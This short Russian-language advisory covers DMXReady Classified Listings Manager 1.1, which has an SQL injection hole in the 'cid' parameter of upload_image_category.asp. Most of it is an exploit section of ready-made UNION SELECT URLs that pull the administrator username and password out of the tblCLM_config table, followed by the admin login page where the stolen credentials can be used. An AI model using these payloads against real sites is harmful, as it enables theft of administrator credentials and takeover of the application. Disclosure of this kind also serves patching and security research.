Программа: DMXReady Classified Listings Manager 1.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cid» сценарием /upload_image_category.asp.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[target]/[path]//admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=[SQL
Inject]
USERNAME:
/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
PASSWORD:
/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
ADMIN LOGIN:
http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp
